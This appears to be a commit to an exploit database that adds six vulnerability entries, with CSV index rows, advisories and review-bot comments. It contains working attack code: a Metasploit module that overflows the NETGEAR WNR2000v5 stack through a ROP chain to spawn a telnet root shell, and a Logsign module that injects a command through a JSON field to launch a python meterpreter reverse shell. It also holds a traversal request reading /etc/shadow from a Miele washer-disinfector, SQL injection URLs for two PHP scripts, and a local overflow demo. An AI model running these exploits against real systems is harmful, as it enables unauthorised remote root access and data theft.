DB: 2017-03-25
6 new exploits

wifirxpower - Local Buffer Overflow
Miele Professional PG 8528 - Directory Traversal
NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)
Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)
Gr8 Tutorial Script - SQL Injection
Gr8 Gallery Script - SQL Injection
This commit is contained in:
parent
3ad96f313d
commit
570f8aec26
7 changed files with 601 additions and 0 deletions
@ -5424,6 +5424,7 @@ id,file,description,date,author,platform,type,port
41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
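Review bot: the description on the new 41715 row, "wifirxpower - Local Buffer Overflow", drops the "Stack Based" qualifier that the advisory file's own title uses ("wifirxpower - Local Stack Based Buffer Overflow"); keep the two consistent, e.g. `41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Stack Based Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0`. Filing it as `dos` is right for what the advisory shows (a FORTIFY abort of a locally run program, not code execution), and the date matches the 2017-03-23 public disclosure in the other advisory added in this commit, so nothing else needs changing here.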
@ -15384,6 +15385,9 @@ id,file,description,date,author,platform,type,port
41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)",2003-03-07,Metasploit,multiple,remote,0
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
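Review bot: the port column is inconsistent across the three new rows: 41719 records 80, while 41718 (whose advisory says the PST10 WebServer "typically listens to port 80") and 41720 (an HttpClient module with `Opt::RPORT` defaulting from the mixin) record 0. Either fill in 80 for all three HTTP entries or leave all three at 0, as the surrounding rows do. Separately, the 41720 row files the Logsign module under `platforms/python/remote` because the module declares `'Platform' => ['python']`; that is the payload platform rather than the target, and the other Metasploit rows in this hunk are filed by target platform (hardware, linux, multiple), so the placement is worth a second look.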
@ -37621,3 +37625,5 @@ id,file,description,date,author,platform,type,port
41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
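Review bot: both Gr8 rows carry no version qualifier, which matches "Version: N/A" in the two advisory files, but the descriptions would be easier to triage if they named the injection point the way the hidden_lang_avi row in the earlier hunk does (the `user` parameter of users.php and the track/ path id for 41716; the video-gallery/ and photo-gallery/ path ids for 41717), so that a reader searching the CSV does not have to open the files to tell the two near-identical entries apart.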
69
platforms/hardware/remote/41718.txt
Executable file
@ -0,0 +1,69 @@
Title:
======
Miele Professional PG 8528 - Web Server Directory Traversal

Author:
=======
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2017-7240

Risk Information:
=================
Risk Factor: Medium
CVSS Base Score: 5.0
CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS Temporal Vector: CVSS2#E:POC/RL:OF/RC:C
CVSS Temporal Score: 3.9

Timeline:
=========
2016-11-16 Vulnerability discovered
2016-11-10 Asked for security contact
2016-11-21 Contact with Miele product representative
2016-12-03 Send details to the Miele product representative
2017-01-19 Asked for update, no response
2017-02-03 Asked for update, no response
2017-03-23 Public disclosure

Status:
=======
Published

Affected Products:
==================
Miele Professional PG 8528 (washer-disinfector) with ethernet interface.

Vendor Homepage:
================
https://www.miele.co.uk/professional/large-capacity-washer-disinfectors-560.htm?mat=10339600&name=PG_8528

Details:
========
The corresponding embeded webserver "PST10 WebServer" typically listens to port 80 and is prone to a directory traversal attack, therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::

Fix:
====
We are not aware of an actual fix.
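Review bot: the timeline is out of order: "2016-11-10 Asked for security contact" is dated six days before "2016-11-16 Vulnerability discovered" yet listed after it, so one of the two dates is a typo and should be corrected before publication, since the timeline is what readers use to judge the disclosure window. Minor wording in the Details section: "embeded" should be "embedded" and "aide" should be "aid". The Fix section only says that no vendor fix is known; given that the affected component is the embedded web server on the device's ethernet interface, it would help operators to state the obvious interim mitigation, namely keeping that interface off networks reachable by untrusted hosts and monitoring for traversal-style request paths on port 80.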
270
platforms/hardware/remote/41719.rb
Executable file
@ -0,0 +1,270 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'time'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CRand

def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow',
'Description' => %q{
The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi
parameter.
In order to exploit it, it is necessary to guess the value of a certain timestamp which
is in the configuration of the router. An authenticated attacker can simply fetch this
from a page, but an unauthenticated attacker has to brute force it.
Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but
it is guaranteed that it can be bruteforced.
This module implements both modes, and it works very reliably. It has been tested with
the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware
revisions v4 and v3, but this has not been tested - with these routers it might be necessary
to adjust the LibcBase variable as well as the gadget addresses.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'References' =>
[
['CVE', '2016-10174'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],
['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'],
['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
],
'Targets' =>
[
[ 'NETGEAR WNR2000v5',
{
'LibcBase' => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so)
'SystemOffset' => 0x547D0,
'GadgetOffset' => 0x2462C,
#The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()):
#LOAD:0002462C addiu $a0, $sp, 0x40+arg_0
#LOAD:00024630 move $t9, $s0
#LOAD:00024634 jalr $t9
'Payload' =>
{
'BadChars' => "\x00\x25\x26",
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
}
],
],
'Privileged' => true,
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DisclosureDate' => 'Dec 20 2016',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']),
OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']),
], self.class)
register_advanced_options(
[
OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200])
], self.class)
end

def check
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers['WWW-Authenticate']
auth = res.headers['WWW-Authenticate']
if auth =~ /WNR2000v5/
return Exploit::CheckCode::Detected
elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
return Exploit::CheckCode::Unknown
end
end
Exploit::CheckCode::Safe
end

def uri_encode (str)
"%" + str.scan(/.{2}|.+/).join("%")
end

def calc_address (libc_base, offset)
addr = (libc_base + offset).to_s(16)
uri_encode(addr)
end

def get_current_time
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res['Date']
date = res['Date']
return Time.parse(date).strftime('%s').to_i
end
end

def get_auth_timestamp
res = send_request_raw({
'uri' => '/lang_check.html',
'method' => 'GET',
# automatically uses HttpPassword and HttpUsername to authenticate
})
if res && res.code == 401
# try again, might fail the first time
res = send_request_raw({
'uri' => '/lang_check.html',
'method' => 'GET',
# automatically uses HttpPassword and HttpUsername to authenticate
})
end
if res && res.code == 200
if res.body =~ /timestamp=([0-9]{8})/
$1.to_i
end
end
end

# Do some crazyness to force Ruby to cast to a single-precision float and
# back to an integer.
# This emulates the behaviour of the soft-fp library and the float cast
# which is done at the end of Netgear's timestamp generator.
def ieee754_round (number)
[number].pack('f').unpack('f*')[0].to_i
end


# This is the actual algorithm used in the get_timestamp function in
# the Netgear firmware.
def get_timestamp(time)
srandom_r time
t0 = random_r
t1 = 0x17dc65df;
hi = (t0 * t1) >> 32;
t2 = t0 >> 31;
t3 = hi >> 23;
t3 = t3 - t2;
t4 = t3 * 0x55d4a80;
t0 = t0 - t4;
t0 = t0 + 0x989680;

ieee754_round(t0)
end

def get_payload
rand_text_alpha(36) + # filler_1
calc_address(target['LibcBase'], target['SystemOffset']) + # s0
rand_text_alpha(12) + # s1, s2 and s3
calc_address(target['LibcBase'], target['GadgetOffset']) + # gadget
rand_text_alpha(0x40) + # filler_2
"killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload
end

def send_req(timestamp)
begin
uri_str = (timestamp == nil ? \
"/apply_noauth.cgi?/lang_check.html" : \
"/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}")
res = send_request_raw({
'uri' => uri_str,
'method' => 'POST',
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"
})
rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
return
end
end

def exploit
# 1: try to see if the default admin username and password are set
timestamp = get_auth_timestamp

# 2: now we try two things at once:
# one, if the timestamp is not nil then we got an authenticated timestamp, let's try that
# two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before)
print_status("#{peer} - Trying the easy way out first")
send_req(timestamp)
begin
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
if not sock.nil?
print_good("#{peer} - Success, shell incoming!")
return handler(sock)
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
sock.close if sock
end

print_bad("#{peer} - Well that didn't work... let's do it the hard way.")

# no shell? let's just go on and bruteforce the timestamp
# 3: get the current date from the router and parse it
end_time = get_current_time
if end_time.nil?
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
end
if end_time <= datastore['TIME_OFFSET']
start_time = 0
else
start_time = end_time - datastore['TIME_OFFSET']
end
end_time += datastore['TIME_SURPLUS']

if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i
end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i
end

print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")
print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")

# 2: work back from the current router time minus datastore['TIME_OFFSET']
while true
for time in end_time.downto(start_time)
timestamp = get_timestamp(time)
sleep 0.1
if time % 400 == 0
print_status("#{peer} - Still working, trying time #{time}")
end
send_req(timestamp)
begin
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
if sock.nil?
next
end
print_status("#{peer} - Success, shell incoming!")
return handler(sock)
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
sock.close if sock
next
end
end
end_time = start_time
start_time -= datastore['TIME_OFFSET']
if start_time < 0
if end_time <= datastore['TIME_OFFSET']
fail_with(Failure::Unknown, "#{peer} - Exploit failed.")
end
start_time = 0
end
print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")

# let the router clear the buffers a bit...
sleep 30
end
end
end
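Review bot: the nil checks on `sock` in `exploit` (`if not sock.nil?` after the first attempt and `if sock.nil? ... next` inside the brute-force loop) never take the nil branch: `Rex::Socket.create_tcp` raises on a failed connect (Rex::ConnectionRefused, Rex::ConnectionTimeout and friends) rather than returning nil, which is exactly what the two `rescue` clauses already handle, so both checks are dead code and can go. `send_req` has a related problem: it discards `res` and returns nil both when the request was delivered and when the connection timed out or reset, so the loop cannot distinguish a router that is dropping requests from one that is silently absorbing them; returning `res` (or a boolean) would make the "Still working" progress output meaningful. Two smaller points: the step comments in `exploit` run 1, 2, 3 and then `# 2: work back from the current router time` a second time, so that one should be 4; and the trailing semicolons in `get_timestamp` (`t1 = 0x17dc65df;`, `hi = (t0 * t1) >> 32;` and so on) are not Ruby style. The `check` method's behaviour is consistent with the description (Detected only for a WNR2000v5 realm, Unknown for v3/v4 where the description says LibcBase and the gadget addresses may differ).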
141
platforms/linux/dos/41715.txt
Executable file
@ -0,0 +1,141 @@
[+] Title: wifirxpower - Local Stack Based Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A

Vendor:
===============

https://github.com/cnlohr/wifirxpower


Download:
===========

https://github.com/cnlohr/wifirxpower


Vulnerability Type:
===================

Local Stack Based Buffer Overflow


issue:
===================

'wifirx.c' contain a vulnerable code in the line '111' the developer use the 'strcpy' function and does not check the buffer destination and cause a Stack Oveflow.

Vulnerable Code (102 - 124) wifirx.c:
===================
int GetQuality( const char * interface, int * noise )
{
int sockfd;
struct iw_statistics stats;
struct iwreq req;


memset(&stats, 0, sizeof(stats));
memset(&req, 0, sizeof(struct iwreq));
strcpy( req.ifr_name, interface );
req.u.data.pointer = &stats;
req.u.data.length = sizeof(struct iw_statistics);
#ifdef CLEAR_UPDATED
req.u.data.flags = 1;
#endif

/* Any old socket will do, and a datagram socket is pretty cheap */
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
if( first ) perror("Could not create simple datagram socket");
first = 0;
//exit(EXIT_FAILURE);
return -1;
}


Exploit:
=========

1 - ./wifirx aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

2 - r $(python -c 'print"A"*41')

Backtrace:
=========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff6ec3e37]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x0)[0x7ffff6ec3e00]
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401aaa]
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401d21]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7ffff6ddb7ed]
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401449]

Memory Map:
===========
00606000-0062a000 rw-p 00000000 00:00 0 [heap]
7ffff6379000-7ffff638e000 r-xp 00000000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff638e000-7ffff658d000 ---p 00015000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff658d000-7ffff658e000 r--p 00014000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff658e000-7ffff658f000 rw-p 00015000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff658f000-7ffff6594000 r-xp 00000000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7ffff6594000-7ffff6793000 ---p 00005000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7ffff6793000-7ffff6794000 r--p 00004000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7ffff6794000-7ffff6795000 rw-p 00005000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7ffff6795000-7ffff6797000 r-xp 00000000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7ffff6797000-7ffff6996000 ---p 00002000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7ffff6996000-7ffff6997000 r--p 00001000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7ffff6997000-7ffff6998000 rw-p 00002000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7ffff6998000-7ffff699a000 r-xp 00000000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff699a000-7ffff6b9a000 ---p 00002000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6b9a000-7ffff6b9b000 r--p 00002000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6b9b000-7ffff6b9c000 rw-p 00003000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6b9c000-7ffff6bb9000 r-xp 00000000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7ffff6bb9000-7ffff6db8000 ---p 0001d000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7ffff6db8000-7ffff6db9000 r--p 0001c000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7ffff6db9000-7ffff6dba000 rw-p 0001d000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7ffff6dba000-7ffff6f6e000 r-xp 00000000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so
7ffff6f6e000-7ffff716d000 ---p 001b4000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so
7ffff716d000-7ffff7171000 r--p 001b3000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7171000-7ffff7173000 rw-p 001b7000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7173000-7ffff7178000 rw-p 00000000 00:00 0
7ffff7178000-7ffff7188000 r-xp 00000000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7ffff7188000-7ffff7387000 ---p 00010000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7ffff7387000-7ffff7388000 r--p 0000f000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7ffff7388000-7ffff7389000 rw-p 00010000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7ffff7389000-7ffff738b000 r-xp 00000000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7ffff738b000-7ffff758a000 ---p 00002000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7ffff758a000-7ffff758b000 r--p 00001000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7ffff758b000-7ffff758c000 rw-p 00002000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7ffff758c000-7ffff75a4000 r-xp 00000000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff75a4000-7ffff77a3000 ---p 00018000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff77a3000-7ffff77a4000 r--p 00017000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff77a4000-7ffff77a5000 rw-p 00018000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff77a5000-7ffff77a9000 rw-p 00000000 00:00 0
7ffff77a9000-7ffff78a4000 r-xp 00000000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so
7ffff78a4000-7ffff7aa3000 ---p 000fb000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so
7ffff7aa3000-7ffff7aa4000 r--p 000fa000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so
7ffff7aa4000-7ffff7aa5000 rw-p 000fb000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so
7ffff7aa5000-7ffff7bd5000 r-xp 00000000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7ffff7bd5000-7ffff7dd5000 ---p 00130000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7ffff7dd5000-7ffff7dd6000 r--p 00130000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7ffff7dd6000-7ffff7dda000 rw-p 00131000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7ffff7dda000-7ffff7dfc000 r-xp 00000000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so
7ffff7fd5000-7ffff7fdb000 rw-p 00000000 00:00 0
7ffff7ff7000-7ffff7ffb000 rw-p 00000000 00:00 0
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so
7ffff7ffd000-7ffff7fff000 rw-p 00023000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]


Tested on:
===============

Linux Ubuntu x86_64
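Review bot: the "Vulnerable Code (102 - 124)" excerpt stops inside GetQuality, right after the socket() error branch, without the function's closing brace, so it should either end at a complete statement or be marked as truncated. The issue paragraph also needs a rewrite for readability: "'wifirx.c' contain a vulnerable code in the line '111' the developer use the 'strcpy' function and does not check the buffer destination and cause a Stack Oveflow" reads better as "'wifirx.c' contains vulnerable code at line 111: the developer uses strcpy without checking the size of the destination buffer, which causes a stack overflow". The advisory should also say what its own backtrace shows: `__fortify_fail` at the top of the trace means the binary was built with FORTIFY_SOURCE and the oversized `strcpy` into `req.ifr_name` (an IFNAMSIZ-byte array) was caught and aborted, so the demonstrated impact is a crash of a program run under the user's own privileges, which is why `dos` is the right classification for this entry. The fix is to bound the copy to `sizeof(req.ifr_name)` (`strncpy` with explicit NUL termination, or rejecting interface names of IFNAMSIZ or more characters up front). Finally, "Tested on: Linux Ubuntu x86_64" gives no release; the memory map shows libc-2.15.so, so state the Ubuntu version that was used.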
19
platforms/php/webapps/41716.txt
Executable file
@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Gr8 Tutorial Script - SQL Injection
# Google Dork: N/A
# Date: 24.03.2017
# Vendor Homepage: http://gr8script.com/
# Software: http://gr8script.com/gr8_tutorial_script.php
# Demo: http://www.gr8script.com/gr8tutorial/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/users.php?user=[SQL]
# http://localhost/[PATH]/track/54[SQL]
# # # # #
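Review bot: the advisory names two injection points but gives no affected version ("Version: N/A"), no indication of the parameter's type for the path-based `track/54[SQL]` case, and nothing a reader could use to confirm the finding or tell a patched install from a vulnerable one, so it cannot be matched against what the vendor currently ships at the Software URL. At minimum record the version that was tested and which of the two endpoints was confirmed on it. Style: "# Author Mail : ihsan[@]ihsan[.]net" has a stray space before the colon, unlike the other header fields.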
19
platforms/php/webapps/41717.txt
Executable file
@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Gr8 Gallery Script - SQL Injection
# Google Dork: N/A
# Date: 24.03.2017
# Vendor Homepage: http://gr8script.com/
# Software: http://gr8script.com/gr8gallery.php
# Demo: http://www.gr8script.com/gr8gallery/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/video-gallery/X[SQL]
# http://localhost/[PATH]/photo-gallery/X[SQL]
# # # # #
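Review bot: this file is identical to 41716.txt apart from the title, the Software and Demo URLs and the two injection URLs, and it has the same gaps: no affected version and no description of the injected `X` path segment. Since both products come from the same vendor and both injection points sit in a rewritten path id, the two advisories should each say whether the same code is involved, so that a fix confirmed for one can be checked against the other rather than assumed.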
77
platforms/python/remote/41720.rb
Executable file
@ -0,0 +1,77 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => 'Logsign Remote Command Injection',
'Description' => %q{
This module exploits an command injection vulnerability in Logsign.
By exploiting this vulnerability, unauthenticated users can execute
arbitrary code under the root user.

Logsign has a publicly accessible endpoint. That endpoint takes a user
input and then use it during operating system command execution without
proper validation.

This module was tested against 4.4.2 and 4.4.137 versions.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/']
],
'Privileged' => true,
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'DefaultOptions' =>
{
'payload' => 'python/meterpreter/reverse_tcp'
},
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Feb 26 2017',
'DefaultTarget' => 0
))

end

def check
p_hash = {:file => "#{rand_text_alpha(15 + rand(4))}.raw"}

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'),
'ctype' => 'application/json',
'data' => JSON.generate(p_hash)
)

if res && res.body.include?('{"message": "success", "success": true}')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end

def exploit
print_status("Delivering payload...")

p_hash = {:file => "logsign.raw\" quit 2>&1 |python -c \"#{payload.encoded}\" #"}

send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'),
'ctype' => 'application/json',
'data' => JSON.generate(p_hash)
)
end
end
